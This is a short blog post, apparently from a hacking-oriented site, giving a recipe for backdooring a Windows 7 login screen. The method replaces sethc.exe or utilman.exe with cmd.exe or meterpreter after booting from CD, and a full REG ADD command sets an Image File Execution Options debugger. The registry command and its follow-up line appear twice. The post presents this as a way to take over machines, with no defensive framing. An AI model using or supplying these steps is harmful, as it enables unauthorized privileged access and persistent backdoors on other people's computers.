Physical access -> bootcd -> change .exe -> 0wned
If you have access to a Win 7 Box, you can still replace the binary c:\windows\system32\sethc.exe by cmd.exe (or meterpreter) and trigger it pressing 5 times the shift key on the login screen.
This also works by replacing c:\windows\system32\utilman.exe, and pressing WINKEY-U in the login screen. (boot from CD to change the files)
....
You can also achieve same results by setting executable of your choice as Debugger to sethc.exe under Image File Execution options in registry. So in a priv command shell, it would be
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
Same goes for Utilman.exe
....
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
Same goes for Utilman.exe
....
No comments:
Post a Comment